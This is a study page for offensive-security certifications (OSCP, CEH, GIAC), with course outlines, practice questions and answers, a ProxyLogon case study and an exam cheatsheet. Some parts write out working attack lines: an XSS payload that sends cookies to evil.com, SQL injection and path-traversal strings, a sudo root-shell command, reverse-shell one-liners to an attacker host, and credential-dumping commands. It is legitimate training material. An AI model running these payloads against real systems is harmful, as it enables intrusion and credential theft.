← All Certifications Offensive Security & GIAC

Offensive Security & GIAC Cert Prep

Study resources, methodology guides, and practice scenarios for offensive security and GIAC/SANS certifications — OSCP, CEH, GPEN, GSEC, GCIH, and more. Built for penetration testers, red teamers, and security analysts.

Offensive Security · 24-hour lab exam

OSCP — Offensive Security Certified Professional

The gold-standard hands-on penetration testing certification. OSCP is a 24-hour proctored lab exam where candidates must compromise a series of machines using only their skill — no multiple choice. Passing requires achieving enough points by submitting proof of compromise (proof.txt files) and a professional penetration testing report. Prerequisites: PEN-200 (PWK) course completion and strong foundational networking, Linux, and scripting knowledge.

PEN-200 (PWK) course topics

Phase 1

Penetration Testing with Kali Linux — Foundations

Kali Linux environment setup, effective command line usage, Bash and Python scripting for automation, passive and active reconnaissance (OSINT, DNS enumeration, Nmap scanning strategies), web vulnerability scanning, and Netcat/Socat for file transfer and shells.

Phase 2

Exploitation

Buffer overflow exploitation (Windows and Linux x86 — stack-based, finding EIP offset, bad characters, shellcode), web application attacks (SQLi manual exploitation, XSS, file inclusion, command injection, file upload bypass), and exploiting public vulnerabilities using Exploit-DB and Metasploit (limited use).

Phase 3

Post-Exploitation — Windows

Windows privilege escalation (service misconfigurations, unquoted service paths, DLL hijacking, token impersonation, SeImpersonatePrivilege, AlwaysInstallElevated), Windows credential attacks (SAM extraction, LSASS dump, pass-the-hash), living off the land (PowerShell, LOLBins), and pivoting through networks.

Phase 4

Post-Exploitation — Linux

Linux privilege escalation (SUID/GUID binaries, sudo misconfiguration, cron jobs, writable /etc/passwd, kernel exploits, weak file permissions, capabilities abuse), credential hunting (history files, config files, .ssh directories), and pivoting using SSH tunnels and chisel.

Phase 5

Active Directory

AD enumeration (BloodHound, PowerView, ldapsearch), Kerberoasting, AS-REP Roasting, pass-the-ticket, pass-the-hash in AD contexts, DCSync, Silver Ticket and Golden Ticket attacks, ACL abuse (WriteDACL, GenericAll, ForceChangePassword), and lateral movement through AD environments.

Phase 6

Report Writing

OSCP exam requires a professional penetration testing report. Must include: executive summary, technical findings with reproduction steps, screenshots, proof.txt content, and remediation recommendations. The report must be submitted within 24 hours of the exam ending. A poor report can cause you to fail even if you compromised all machines.

OSCP exam strategy — "Try Harder" tips

  • Enumerate thoroughly first — most exam failures are from missing a service or misconfiguration during enumeration, not inability to exploit
  • Take breaks — the 24-hour format is a mental marathon; 1–2 hour rest periods improve decision quality
  • Take notes continuously — commands run, output received, screenshots; the report depends on your notes
  • Don't tunnel-vision — if stuck for 45 minutes, move to the next machine and return later
  • Active Directory is highest value — understand the AD attack chain completely; it represents a significant portion of exam points
  • Metasploit is limited — one machine only; use manual exploitation for all others
  • Know your tools cold — nmap, gobuster/feroxbuster, linpeas/winpeas, BloodHound, impacket, chisel, ligolo-ng
EC-Council · 125 questions · 4 hours

CEH — Certified Ethical Hacker

The most widely recognised ethical hacking certification globally. CEH is knowledge-based (multiple choice), not hands-on like OSCP. It covers the full ethical hacking methodology and is valued by organisations screening candidates for penetration testing and offensive security roles. CEH v13 introduces AI-powered attack and defence concepts. Requires two years of information security experience or EC-Council approved training.

Phase 1

Reconnaissance & Footprinting

Information gathering techniques (OSINT, Google hacking / dorks, Shodan, Maltego, theHarvester), DNS footprinting (zone transfer, record types), email footprinting (email header analysis, tracking pixels), social engineering reconnaissance, and dark web intelligence gathering.

Phase 2

Scanning & Enumeration

Network scanning (Nmap scan types: SYN, TCP Connect, UDP, NULL, FIN, XMAS, IDLE), OS fingerprinting (TTL values, window sizes), service enumeration techniques, vulnerability scanning (Nessus, OpenVAS), SNMP enumeration, LDAP enumeration, and banner grabbing.

Phase 3

System Hacking

Password cracking methods (dictionary, brute force, rule-based, rainbow tables — tools: Hashcat, John the Ripper, Hydra), privilege escalation techniques, covering tracks (log manipulation, Rootkit installation), and steganography (hiding data in images, audio, and video files — tools: OpenStego, Steghide).

Phase 4

Network, Web, and Application Attacks

Network attacks (sniffing, ARP poisoning, MITM, DHCP starvation, MAC flooding), web application attacks (OWASP Top 10, SQL injection, XSS, CSRF, SSRF, XXE), denial of service and DDoS techniques and countermeasures, session hijacking, and cryptographic attacks (birthday attack, collision attack, downgrade attack).

Phase 5

Emerging Threat Areas

IoT and OT/SCADA attack vectors, cloud security attack techniques (cloud enumeration, misconfiguration exploitation, instance metadata attacks), mobile platform hacking (Android and iOS vulnerabilities, APK reverse engineering), and AI-augmented attack techniques (prompt injection, adversarial ML, AI-generated phishing).

GIAC / SANS Institute

GIAC Certifications — SANS-Aligned Track

GIAC (Global Information Assurance Certification) certifications are issued by the SANS Institute — the premier technical training organisation in information security. GIAC certs are open-book (you may bring notes and books), but the questions are difficult scenario-based questions that require deep understanding. The GIAC certification is typically taken after completing the corresponding SANS course.

GSEC · SEC401

GIAC Security Essentials

Comprehensive foundational security certification. Covers: access control, cryptography, DNS, network protocols (TCP/IP stack in depth), network security (firewalls, IDS/IPS, VPN), Linux and Windows security fundamentals, cloud security basics, incident response, and vulnerability scanning. Equivalent to Security+ but significantly more technical. Good first GIAC cert.

GPEN · SEC560

GIAC Penetration Tester

Professional-level penetration testing certification. Covers: planning and scoping, recon and enumeration, exploitation (Metasploit, exploit development), password attacks, post-exploitation, pivoting, Active Directory attacks (Kerberoasting, pass-the-hash, BloodHound), and report writing. Highly technical exam — requires substantial hands-on experience.

GCIH · SEC504

GIAC Certified Incident Handler

Incident response and threat hunting. Covers: the attack lifecycle (reconnaissance, exploitation, post-exploitation), hacker tools and techniques (understanding attacker TTPs), incident handling phases, evidence collection, containment strategies, and network forensics. Valued for SOC team leads and IR consultants. Aligns to MITRE ATT&CK framework.

GWAPT · SEC542

GIAC Web Application Penetration Tester

Web application security testing. Covers: OWASP Top 10 deep-dive, SQL injection (manual and automated), XSS exploitation chains, CSRF, SSRF, XXE, authentication attacks, session management testing, API security testing, and JavaScript security analysis. Ideal for application security engineers and web pentesters.

GCED · SEC501

GIAC Certified Enterprise Defender

Defensive security and enterprise security architecture. Covers: network security monitoring, intrusion detection (Snort/Suricata rule writing), vulnerability management, web proxies, defence architecture design, and continuous monitoring. Bridges the gap between defensive operations and security engineering.

GREM · FOR610

GIAC Reverse Engineering Malware

Malware analysis and reverse engineering. Covers: static analysis (strings, PE headers, disassembly with Ghidra/IDA), dynamic analysis (sandbox analysis, behavioural analysis), x86/x64 assembly basics, obfuscation and unpacking, memory forensics, and malware family identification. Advanced cert — recommended after GCIH or significant incident response experience.

GIAC exam strategy — open book, not open mind

GIAC exams allow books and notes, but the time limit (typically 3 hours) prevents looking up everything. Successful candidates build an "index" before exam day:

  • Create a master index document with every key concept, tool, command, and page number from your notes
  • Tab/colour-code your printed notes by topic area
  • Practise with the GIAC practice exams until you can answer without looking up most questions — use the index only for confirming details
  • Know tool flags and output formats cold — many questions show tool output and ask for interpretation
EC-Council advanced track

EC-Council Advanced Certifications

CPENT

Certified Penetration Testing Professional

EC-Council's hands-on penetration testing cert (more practical than CEH). 24-hour live range exam. Covers advanced exploitation, pivoting, IoT pentesting, OT/SCADA pentesting, bypass techniques (AV evasion, firewall bypass), and exploit writing. Good bridge between CEH and OSCP in terms of difficulty.

CHFI

Computer Hacking Forensic Investigator

Digital forensics certification covering: forensic investigation process (first responder, evidence acquisition, chain of custody), Windows forensics (registry, event logs, browser artefacts, prefetch), mobile forensics, network forensics (packet capture analysis, log correlation), cloud forensics, and forensic reporting for legal proceedings.

ECSA

EC-Council Certified Security Analyst

Advanced security analysis certification covering in-depth security assessment methodology, network penetration testing, web application testing, social engineering assessment, report writing for enterprise clients, and security programme assessment. Considered a progression from CEH for analysts moving into consultancy roles.

CASE Java / .NET

Certified Application Security Engineer

Application security engineering focused on Java or .NET platforms. Covers SAST, DAST, secure coding practices for the specific platform, threat modelling, penetration testing of applications, and DevSecOps integration. Niche cert valued by application security teams in Java or .NET shops.

CEH and GIAC sample questions

Practice Questions — Offensive Security

1. (CEH) A penetration tester uses Nmap and observes that a target host responds to SYN packets with SYN-ACK but then the connection is reset. Which type of port scan is being used, and what does this result indicate?

  • A) UDP scan — the port is filtered
  • B) SYN (half-open) scan — the port is open
  • C) TCP Connect scan — the port is closed
  • D) XMAS scan — the port is filtered
Answer: B A SYN scan (also called a half-open scan) sends a SYN packet. An open port responds with SYN-ACK. The scanner then sends a RST (reset) to tear down the connection before it completes — avoiding a full TCP handshake and reducing log entries. A closed port responds with RST-ACK. A filtered port produces no response or an ICMP unreachable message.

2. (GCIH) During an incident investigation, an analyst finds that an attacker has created a scheduled task on a compromised Windows host to run a PowerShell script every 15 minutes. Which MITRE ATT&CK tactic does this represent?

  • A) Initial Access
  • B) Execution
  • C) Persistence
  • D) Lateral Movement
Answer: C Creating a scheduled task to re-execute malicious code is the Persistence tactic (TA0003) in MITRE ATT&CK — specifically T1053.005 (Scheduled Task/Job: Scheduled Task). The attacker is ensuring their code survives reboots and continues running. Execution (B) would be the tactic for the initial running of the script; Persistence is the mechanism that ensures it keeps running.

3. (OSCP / GPEN) A penetration tester has compromised a Linux host and finds the following output when running sudo -l: (ALL) NOPASSWD: /usr/bin/find. Which technique allows privilege escalation?

  • A) Run sudo find / -exec cat /etc/shadow \; to read the shadow file
  • B) Run sudo find . -exec /bin/bash \; -quit to spawn a root shell
  • C) Find SUID binaries using sudo find / -perm -4000
  • D) Use find to locate world-writable cron job scripts
Answer: B When find has NOPASSWD sudo permissions, the -exec flag can be used to execute arbitrary commands as root. Running sudo find . -exec /bin/bash \; -quit spawns a bash shell as root. This is a standard GTFOBins (gtfobins.github.io) technique — a reference every penetration tester should know for sudo, SUID, and capability privilege escalation.
Hands-on practice environments

Lab & Environment Guide

Offensive security certifications require extensive hands-on practice. Below are the key platforms for building practical skills before attempting OSCP, CEH, or GIAC hands-on exams.

Hack The Box (HTB)

The premier platform for OSCP preparation. HTB machines closely match OSCP exam difficulty and style. Key advice:

  • Complete all "Retired Easy and Medium" Linux and Windows machines before your OSCP exam
  • Use HTB Academy's CPTS path for structured learning alongside the PEN-200 course
  • Practice the Pro Labs (Offshore, RastaLabs) for Active Directory chaining

TryHackMe

Guided, beginner-friendly rooms with step-by-step walkthroughs. Good starting point before HTB:

  • Complete "Jr Penetration Tester" path before attempting HTB
  • Use the "Red Teaming" path for post-exploitation and AD techniques
  • Covers CEH and CompTIA PenTest+ aligned rooms

Offensive Security Proving Grounds (PG)

Offensive Security's own practice lab — machines rated "Try" and "Play" are free; "Practice" is paid. Machines are curated to match OSCP exam style. Recommended alongside HTB for OSCP candidates.

Local lab with Vulnhub

Vulnhub provides free downloadable vulnerable VMs for offline practice. Run them in VirtualBox or VMware alongside your Kali or Parrot OS attacker VM. Good for practising without an internet connection and for understanding older CVEs.

GIAC practice exam access

GIAC provides two practice exams included with your certification attempt. Use these to calibrate your index before the real exam. The SANS courseware and any associated books can be used during the live exam.

Essential tools to master

  • Reconnaissance: Nmap, Gobuster, Feroxbuster, Nikto, WhatWeb
  • Exploitation: Metasploit (limited), Searchsploit, manual PoC adaptation
  • Post-exploitation: LinPEAS, WinPEAS, BloodHound, Mimikatz, Impacket suite
  • Pivoting: Chisel, Ligolo-ng, SSH dynamic port forwarding
  • Reporting: CherryTree, Obsidian, or Notion for note-taking during engagements

Explore other certification tracks

← All Certifications CompTIA (PenTest+) → ISACA Prep →
CEH & GPEN sample questions

Practice Questions — CEH & GIAC Pen Test

CEH and GPEN are knowledge-based exams testing ethical hacking concepts, tools, and methodology. Understanding the "why" behind each technique — not just the tool name — is critical for both exams.

1. (CEH) A hacker sends a TCP SYN packet to a target port but never completes the three-way handshake. What type of scan is this?

  • A) TCP Connect scan
  • B) TCP SYN (stealth/half-open) scan
  • C) UDP scan
  • D) XMAS scan
Answer: B The TCP SYN scan (also called a half-open or stealth scan) sends a SYN packet and listens for SYN-ACK (port open) or RST (port closed) but never sends the final ACK to complete the handshake. This makes it harder to log because no full connection is established. Nmap uses this as its default scan (-sS) when run with root privileges. A TCP Connect scan (-sT) completes the full handshake and is more easily detected and logged.

2. (CEH) During reconnaissance, an attacker queries WHOIS, reviews job postings, and searches for employee LinkedIn profiles. Which phase of the EC-Council hacking methodology does this represent?

  • A) Scanning
  • B) Gaining Access
  • C) Passive Footprinting (Reconnaissance)
  • D) Maintaining Access
Answer: C Passive footprinting gathers information without direct interaction with the target — WHOIS, DNS lookups, job boards, social media, Shodan, and Google dorking are all passive techniques. This is the first phase of the EC-Council five-phase methodology: Reconnaissance → Scanning → Gaining Access → Maintaining Access → Clearing Tracks. The distinction between passive (no target contact) and active (direct target interaction) reconnaissance is frequently tested.

3. (GPEN) A penetration tester has SYSTEM-level access on a Windows host and wants to extract password hashes from the SAM database without rebooting. Which tool accomplishes this?

  • A) Mimikatz with sekurlsa::logonpasswords
  • B) Mimikatz with lsadump::sam
  • C) John the Ripper
  • D) CrackMapExec
Answer: B Mimikatz's lsadump::sam module dumps NTLM hashes from the SAM database using the registry (requires SYSTEM privileges and Volume Shadow Copy or registry hive techniques). sekurlsa::logonpasswords (A) extracts plaintext credentials and NTLM hashes from LSASS memory — useful for currently logged-in users. John the Ripper (C) cracks hashes offline after extraction. CrackMapExec (D) is used for network-wide lateral movement and credential spraying.

4. (CEH) An attacker intercepts communication between a client and server and presents a forged certificate to the client. The client's browser shows a certificate warning. What type of attack is this?

  • A) SSL stripping
  • B) Man-in-the-Middle (MitM) with SSL interception
  • C) Session hijacking
  • D) ARP poisoning
Answer: B Presenting a forged certificate to intercept TLS-encrypted traffic is SSL/TLS MitM interception. The certificate warning appears because the forged cert is not signed by a trusted CA. SSL stripping (A) downgrades HTTPS to HTTP rather than intercepting TLS — no certificate is involved. Session hijacking (C) steals an existing authenticated session token. ARP poisoning (D) is a technique used to position for MitM but is not itself the certificate-based attack described.

5. Which of the following BEST describes the purpose of a Rules of Engagement (RoE) document in a penetration test?

  • A) A technical checklist of vulnerabilities to test
  • B) A legal document defining the scope, permitted techniques, timing, and escalation procedures for the engagement
  • C) A report template for documenting findings
  • D) A network diagram provided by the client
Answer: B The Rules of Engagement define exactly what the tester is and is not permitted to do: target IP ranges, excluded systems, permitted attack techniques, testing windows, emergency stop procedures, and escalation contacts. It protects both the tester (legal authorisation) and the client (prevents unintended impact). Without a signed RoE, even a well-intentioned penetration test can constitute unauthorised computer access — a criminal offence.
OSCP hands-on scenarios

Practice Scenarios — OSCP Methodology

OSCP success depends on methodology, not memorisation. These scenarios reinforce the enumeration → exploitation → privilege escalation workflow you must execute under exam pressure. Practice these against TryHackMe and HackTheBox machines until they become automatic.

Scenario 1: You have shell access as an unprivileged Linux user. Which enumeration step should be performed FIRST to identify privilege escalation paths?

  • A) Run kernel exploits immediately to test for known CVEs
  • B) Run a comprehensive enumeration script (LinPEAS, linux-smart-enumeration) to systematically gather information about users, processes, capabilities, SUID binaries, cron jobs, writable directories, and sudo permissions
  • C) Read /etc/shadow
  • D) Reboot the system
Answer: B Always enumerate before attempting privilege escalation. linpeas.sh is the de facto standard — it gathers OS version, kernel, users, sudo -l output, SUID binaries (cross-referenced with GTFOBins), capability flags, writable paths in PATH, cron jobs running as root, listening services on localhost, and credentials in environment variables. Reading the output systematically reveals at least one viable privesc path on 95% of exam-difficulty machines. Kernel exploits (A) are a last resort — they can crash the target and are often patched on modern systems.

Scenario 2: An nmap scan reveals port 80 (HTTP) and 8080 (HTTP-alt) open. The default scan shows "Apache 2.4.41" on both ports. What is the next BEST step?

  • A) Search Exploit-DB for Apache 2.4.41 vulnerabilities
  • B) Manually browse both ports, check HTTP headers, inspect page source, and run gobuster/feroxbuster to discover hidden paths — then enumerate any web application discovered
  • C) Run nikto with default settings and stop
  • D) Try a common password list against the default Apache admin login
Answer: B Apache version alone rarely yields a direct exploit on OSCP machines. The application hosted on Apache is almost always the entry point. Always: 1) browse manually first; 2) check robots.txt, sitemap, and HTTP headers (Server, X-Powered-By); 3) view-source for clues; 4) directory brute-force with a relevant wordlist (common.txt, then larger lists if needed); 5) identify the application (WordPress, Joomla, custom PHP, etc.); 6) enumerate the specific application. Each open port becomes a deep enumeration target — this is "Try Harder" in practice.

Scenario 3: A Windows machine exposes SMB on port 445 and shows "Server 2016". You have no credentials. What enumeration tooling should you use?

  • A) Try EternalBlue (MS17-010) immediately
  • B) Use smbclient -L \\target -N (null session), then enum4linux-ng, then crackmapexec smb target with no creds to enumerate users/shares/policy
  • C) Try common passwords against the Administrator account
  • D) Scan all 65535 ports first
Answer: B SMB enumeration on unauthenticated SMB: smbclient -L //target -N lists shares accessible to null sessions; enum4linux-ng -A target enumerates users, shares, password policy, and OS info; crackmapexec smb target confirms signing requirements, SMB version, and null session viability. After enumeration, attempt anonymous access to accessible shares — credentials and config files are frequently found in IPC$ and other readable shares. Only attempt EternalBlue (A) after confirming unpatched SMBv1 — it can crash modern Windows hosts.

Scenario 4: You have a low-privilege Windows shell. Running whoami /priv shows SeImpersonatePrivilege is enabled. Which exploitation path does this enable?

  • A) Mimikatz to dump LSASS memory
  • B) "Potato" family exploits (JuicyPotato, PrintSpoofer, RoguePotato, GodPotato) to abuse impersonation and gain SYSTEM
  • C) Kernel exploit chain
  • D) Pass-the-Hash against the local SAM
Answer: B SeImpersonatePrivilege allows a process to impersonate a token from any client connecting to it. The "Potato" exploits leverage this by triggering a SYSTEM-level service to authenticate to a local listener, capturing its token, and impersonating SYSTEM. PrintSpoofer and GodPotato work on modern Windows 10/11/Server 2019+. This privilege is granted by default to IIS, MSSQL, and other service accounts — making web shell foothold → SYSTEM a one-step escalation. Memorise the SE* privileges that enable privilege escalation: SeImpersonate, SeAssignPrimaryToken, SeBackup, SeRestore, SeDebug.

Scenario 5: You successfully pop a reverse shell with netcat but the connection is unstable — Ctrl-C kills your shell, tab completion doesn't work, and arrow keys produce garbage. How do you upgrade to a fully interactive TTY?

  • A) Reconnect with a different listener
  • B) Use python -c 'import pty; pty.spawn("/bin/bash")', then on local: stty raw -echo; fg, then on remote: export TERM=xterm-256color; stty rows X cols Y
  • C) Use SSH instead
  • D) Restart the target service
Answer: B The "TTY upgrade" sequence every OSCP candidate must memorise: 1) on the target, python3 -c 'import pty; pty.spawn("/bin/bash")' (or python, script, socat, etc.); 2) Ctrl-Z to background the netcat listener; 3) on local: stty raw -echo; fg (typing fg blind, then Enter twice); 4) on target: export TERM=xterm-256color and stty rows 50 cols 200. Result: full TTY with tab completion, arrow keys, Ctrl-C, vim/nano, and SSH-like usability. Saves hours during exam.
Web application testing

Practice Questions — Web Application Penetration Testing

Web apps are the dominant attack surface — OSCP 2024+, CEH, GPEN, and PenTest+ all heavily test web vulnerabilities. Master the OWASP Top 10 and Burp Suite workflow.

1. A login form sends credentials over HTTPS but the password field validation is performed client-side in JavaScript before submission. Why is this an inadequate control?

  • A) Client-side validation can be bypassed by intercepting the request in Burp Suite and modifying it before forwarding to the server, or by directly crafting requests with curl
  • B) JavaScript is too slow
  • C) The validation runs on a separate thread
  • D) Client-side validation always works correctly
Answer: A Client-side validation is a UX feature, not a security control. The attacker controls the browser; they can disable JavaScript, intercept the request in Burp, or skip the browser entirely. Server-side validation must be present in addition to (not instead of) client-side checks. This concept applies to all input validation, not just passwords — any constraint that must hold must be enforced server-side.

2. During testing, you submit ' OR '1'='1 in a login form and receive a successful login as the first user in the database. What vulnerability is this?

  • A) Cross-Site Scripting (XSS)
  • B) Authentication SQL injection via tautology
  • C) Buffer overflow
  • D) HTTP parameter pollution
Answer: B The classic SQL injection authentication bypass. The unsafe query SELECT * FROM users WHERE username='$user' AND password='$pass' becomes SELECT * FROM users WHERE username='' OR '1'='1' AND password=''. The OR clause is always true, returning all users. Many applications grant the session to the first row (often the admin). Defence: parameterised queries (prepared statements) — never concatenate user input into SQL. Modern ORMs handle this correctly by default.

3. A web application allows authenticated users to download invoices by visiting /invoice?id=1234. By changing the ID, you can view other customers' invoices. What vulnerability class is this?

  • A) Insecure Direct Object Reference (IDOR) — also known as Broken Access Control in OWASP Top 10
  • B) SQL injection
  • C) XSS
  • D) Server-Side Request Forgery
Answer: A IDOR is the #1 issue in OWASP Top 10 2021 ("A01 Broken Access Control"). The application references objects by predictable IDs without validating that the authenticated user owns the requested object. Fix: server-side authorisation check on every request that compares the authenticated user against the requested object's owner. Use UUIDs instead of incremental IDs as defence in depth, but never rely on unpredictable IDs alone — IDs leak through logs, browser history, and Referer headers.

4. A penetration tester wants to confirm a suspected blind SQL injection on a search field. The application returns the same response regardless of input. Which technique can confirm injection?

  • A) Time-based blind injection — inject ' AND SLEEP(5)-- and observe whether the response is delayed by 5 seconds
  • B) Union-based injection
  • C) Error-based injection
  • D) Buffer overflow
Answer: A Blind SQL injection has no visible difference in responses, so use side-channels. Time-based: inject a SLEEP/WAITFOR DELAY that runs only when the injection is interpreted as SQL. A 5-second pause confirms execution; missing delay means no injection. Boolean-based blind is an alternative — inject a TRUE/FALSE condition and observe slight response differences. sqlmap automates both techniques. Always test multiple times to rule out network latency variance.

5. A web application fetches user-supplied URLs on the server to generate previews. What vulnerability does this represent and what is the highest-risk target an attacker would probe?

  • A) CSRF — the server forges the user's request
  • B) SSRF — Server-Side Request Forgery; the attacker would target cloud metadata endpoints such as http://169.254.169.254/latest/meta-data/ to retrieve IAM credentials
  • C) XSS — reflected script in the URL preview
  • D) Open redirect to an attacker-controlled site
Answer: B SSRF (A08 in OWASP Top 10 2021) occurs when user-controlled input causes the server to make outbound HTTP requests. The server has trust relationships and network access the attacker doesn't — it can reach internal services (Redis, Elasticsearch, internal APIs) and, on AWS/GCP/Azure, the instance metadata service at 169.254.169.254 which returns IAM credentials. These credentials allow cloud resource takeover. Defence: allowlist of permitted URLs (not blocklist — 169.254 can be bypassed with DNS rebinding and encoding tricks), require HTTPS with certificate validation, disable redirects in server-side HTTP client. PortSwigger Web Security Academy has excellent free SSRF labs at portswigger.net/web-security/ssrf.

6. A web application stores user-supplied comments and later renders them in the admin panel without HTML-encoding. An attacker submits <script>document.location='https://evil.com/steal?c='+document.cookie</script>. What is the attack type and impact?

  • A) Reflected XSS — only the submitter is affected
  • B) Stored (Persistent) XSS — executes for every admin who visits the panel, enabling session hijacking and admin account takeover
  • C) DOM-based XSS — only affects the victim's local DOM
  • D) CSRF — forces the admin to make unintended requests
Answer: B Stored XSS persists in the database and executes in every user's browser that loads the page. In an admin panel, this grants the attacker admin-level session cookies, enabling full account takeover and privilege escalation. The impact is the highest of all XSS variants. Defence: output encoding (HTML-encode all user-controlled content before rendering), Content Security Policy (CSP) headers, HttpOnly cookie flags (prevents JavaScript access to session cookies). Practice stored XSS on PortSwigger Web Security Academy — Stored XSS labs (free).

7. During a black-box web assessment, you notice that the application includes the file name from a URL parameter: /view?page=about.php. What should you test for?

  • A) Local File Inclusion (LFI) by trying path traversal sequences like ../../../../etc/passwd
  • B) Buffer overflow by sending a very long page parameter
  • C) SQL injection by appending a single quote
  • D) XML injection by supplying an XML document
Answer: A A URL parameter that controls which file is loaded (include($_GET['page']) in PHP) is a classic LFI entry point. Test with ../../../etc/passwd (and URL-encoded variants %2e%2e%2f) to read sensitive files. Advanced LFI can chain to RCE via: PHP log poisoning (inject PHP into Apache/Nginx access logs via User-Agent, then include the log file), PHP filter chains, /proc/self/environ, and session file inclusion. This is a core OSCP technique — every candidate should practice LFI to RCE escalation. Reference: HackTricks — File Inclusion.
Common questions

Offensive Security Certification FAQ

How hard is the OSCP exam?

OSCP is widely considered the most respected entry-to-intermediate penetration testing certification. The exam is a 24-hour live penetration test against a controlled network — you must compromise machines and write a professional report. First-attempt pass rates are estimated at 15–25%, though candidates who complete all PEN-200 labs have significantly higher success rates. Try Harder is the unofficial OSCP motto — persistence is as important as technical skill.

Is CEH worth getting in 2026?

The CEH is valuable in specific contexts: it satisfies DoD 8570 IAT Level II requirements and is recognised in corporate and government environments. However, technical hiring managers in offensive security roles typically value hands-on credentials like OSCP significantly more. CEH is best for compliance-driven roles or security professionals in management-track positions who need a recognised offensive security credential without a hands-on exam.

What is the OSCP exam format?

The OSCP exam provides 24 hours to compromise machines in a controlled network environment, followed by 24 hours to write and submit a professional penetration test report. The passing score is 70 points out of 100. You can earn bonus points by completing all course exercises and 30 lab machines before the exam — up to 10 bonus points are available. These bonus points can be the difference between passing and failing.

What should I study before attempting OSCP?

Complete TryHackMe's "Jr Penetration Tester" path for fundamentals, then work through HackTheBox machines (focus on retired easy/medium machines with available writeups). Practice your methodology until enumeration is automatic: nmap service scanning, web app directory fuzzing, SMB enumeration, and privilege escalation checklists for both Linux and Windows. Aim to own 50+ machines before booking your exam. The TCM Security PEH course is an excellent and affordable preparation resource.

Interactive · Concept check · Hands-on still required

Interactive Concept Test — OSCP / PEN-200

OSCP is fully hands-on — multiple choice cannot replace lab practice. This 15-item concept test validates that you understand the techniques you will need to execute under exam conditions (enumeration, LFI/RFI, Linux & Windows privilege escalation, Active Directory). Use lab time on TryHackMe, HackTheBox, and PG Practice to build muscle memory.

Loading the interactive concept test… If it does not load, ensure JavaScript is enabled.

Case study · From exam to engagement

Real-World Walkthrough: HAFNIUM / Exchange Server (2021)

The 2021 Microsoft Exchange ProxyLogon chain is the perfect bridge between OSCP techniques and real-world incident response. The chain begins with an SSRF, escalates to authentication bypass, then drops a webshell — a textbook OSCP "find the entry, escalate, persist" pipeline.

The exploit chain

  • CVE-2021-26855 (SSRF): Server-side request forgery in Exchange's frontend autodiscover service lets an unauthenticated attacker craft requests that Exchange treats as internal — bypassing authentication entirely.
  • CVE-2021-26857 (Insecure deserialization): Once authenticated (via the SSRF), the attacker triggers unsafe .NET deserialization in the Unified Messaging service, achieving RCE as SYSTEM.
  • CVE-2021-26858 / CVE-2021-27065 (Arbitrary file write): Used to drop webshells (China Chopper variants) into the Exchange web root.
  • Persistence: Webshell at a predictable path (/owa/auth/<random>.aspx) enabled long-term access. Tens of thousands of organisations were compromised before the patches were widely applied.

OSCP-skill mapping

  • Enumeration: Recognising Exchange (port 443 + autodiscover endpoints) is the kind of fingerprinting drilled in OSCP. Nuclei templates for CVE-2021-26855 + manual curl confirmation = OSCP methodology.
  • Web exploitation: SSRF → authentication bypass → file write → RCE is a chained-vulnerability technique that mirrors how OSCP web challenges escalate from a small bug to full compromise.
  • Web shell deployment: Writing files into a web root and accessing them via HTTP is a foundational OSCP skill (think: file upload bypass exercises).
  • Post-exploitation: Exchange runs as a high-privilege account on a domain-joined host — instant pivot into Active Directory enumeration. BloodHound + Kerberoasting + DCSync = predictable next moves.
  • Detection & defence: ProxyLogon teaches the defensive side too — out-of-band patching is mandatory, EDR must look for child processes of w3wp.exe, and Exchange should never have direct internet exposure without protective architecture (Exchange Edge or M365 fronting).
  • Career relevance: Real-world engagements include Exchange/SharePoint/IIS targets constantly. OSCP gives you the tooling; cases like HAFNIUM teach you why it matters.
Free & reputable only · Verified links

Helpful Materials — OSCP & Offensive Tracks

OSCP is a lab certification. No amount of reading replaces lab time. Every resource below is free or free-tier. The most effective preparation uses structured learning (TryHackMe/PortSwigger) before unstructured practice (VulnHub/HTB free tier).

Free web security training (essential)

Free practice lab platforms

Official primary references (all free)

Free reference cheatsheets

Free Active Directory resources

Communities (free)

Quick reference · OSCP exam day

OSCP Methodology Cheatsheet

Reusable commands and methodology blocks. Print this for exam day.

Initial recon

  • nmap -sV -sC -p- --min-rate 5000 -T4 -oN nmap/all $T
  • nmap -sU --top-ports 50 -oN nmap/udp $T (UDP often skipped)
  • ffuf -u http://$T/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e .php,.html,.txt
  • gobuster vhost -u http://$T -w subdomains-top1million-5000.txt
  • smbclient -L //$T -N · enum4linux-ng -A $T

Linux PrivEsc checklist

  • sudo -l (and check GTFOBins for every binary)
  • find / -perm -4000 -type f 2>/dev/null (SUID)
  • linPEAS / LinEnum automated enumeration
  • Check /etc/cron*, /var/spool/cron, writable PATH
  • Kernel exploits (last resort) — uname -a vs exploit-db
  • NFS no_root_squash, weak file caps, capabilities (getcap -r / 2>/dev/null)

Windows PrivEsc checklist

  • whoami /priv /groups
  • WinPEAS / PowerUp.ps1
  • Unquoted service paths, weak service ACLs
  • AlwaysInstallElevated registry keys
  • GPP cpassword in \\domain\SYSVOL
  • Token impersonation: PrintSpoofer / GodPotato (SeImpersonate)
  • SeBackupPrivilege → read SAM/SYSTEM hives

Reverse shells (one-liners)

  • bash -i >& /dev/tcp/$ATTACKER/4444 0>&1
  • python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("$ATTACKER",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];subprocess.call(["/bin/sh","-i"])'
  • PowerShell: $c=New-Object Net.Sockets.TCPClient("$ATTACKER",4444);…
  • Stabilise: python3 -c 'import pty;pty.spawn("/bin/bash")' → Ctrl+Z → stty raw -echo; fg

Active Directory toolkit

  • BloodHound + SharpHound — attack-path graphs
  • impacket-GetUserSPNs / GetNPUsers — Kerberoast / ASREProast
  • impacket-secretsdump — DCSync once you have rights
  • evil-winrm — shell with creds or NT hash
  • Rubeus — ticket request / Pass-the-Ticket / S4U abuse
Study tools · Active recall · OSCP / CEH / eJPT

Flashcards & Term-Matching Game

Active recall beats passive reading for long-term retention. Use the flashcards to drill definitions and the matching game to reinforce connections between concepts. Shuffle to mix domains and reset to start fresh. Keyboard navigation supported on flashcards.

Flashcard Deck — Key Terms

Loading flashcards… ensure JavaScript is enabled.

Term-Matching Game

Click a term on the left, then click its matching definition on the right. Correct pairs lock in green; wrong pairs flash red. Complete all pairs to advance to the next round.

Loading matching game… ensure JavaScript is enabled.

Speed Round — True or False

You have 10 seconds per statement. Answer TRUE or FALSE before the timer runs out. Build a combo multiplier for consecutive correct answers and beat your session high score.

Loading speed round… ensure JavaScript is enabled.

Fill in the Blank

Read the clue and type the missing term. One typo is forgiven for longer answers. Use the hint button if you're stuck — but it costs half the question's points.

